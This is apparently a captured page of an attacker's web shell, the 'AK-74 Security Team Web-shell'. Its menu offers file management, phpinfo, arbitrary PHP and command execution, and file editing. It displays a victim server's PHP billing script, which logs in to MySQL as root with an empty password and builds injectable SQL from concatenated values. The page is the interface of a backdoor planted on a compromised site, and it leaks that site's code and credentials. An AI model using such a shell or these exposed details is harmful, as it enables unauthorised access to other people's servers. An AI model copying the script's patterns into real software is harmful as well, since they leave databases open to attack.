.:: :[ AK-74 Security Team Web-shell ]: ::.
General information
File manager
phpinfo()
Run PHP
Execute the command
Edit the file
<?php $ms = mysqli_connect("localhost", "root","", "gs"); $q = "select * from gs_users WHERE manager_id !=0"; $r = mysqli_query($ms, $q); while ($row = mysqli_fetch_array($r)) { $id = $row['manager_id']; $subid = $row['id']; $q2 = "select bill_date from gs_users WHERE id = $id "; $r2 = mysqli_query($ms, $q2); $row2 = mysqli_fetch_array($r2); $bill_date = $row2['bill_date']; // $bill_date=strtotime($bill_date); //$bill_date = date('Y-m-d', strtotime($bill_date)); // $q3 = "update gs_users // set bill_date = TO_DATE($bill_date,'YYYY-MM-DD') // where id = $subid"; $q3="UPDATE `gs_users` SET `bill_date`='$bill_date' WHERE (`id`='$subid')"; //$q3="INSERT INTO gs_users (bill_date) VALUE ('$bill_date') WHERE id=$subid"; $r3 = mysqli_query($ms, $q3) or die($q3); echo 'true change sub account bill_date <br>'; } ?>
Rename:
-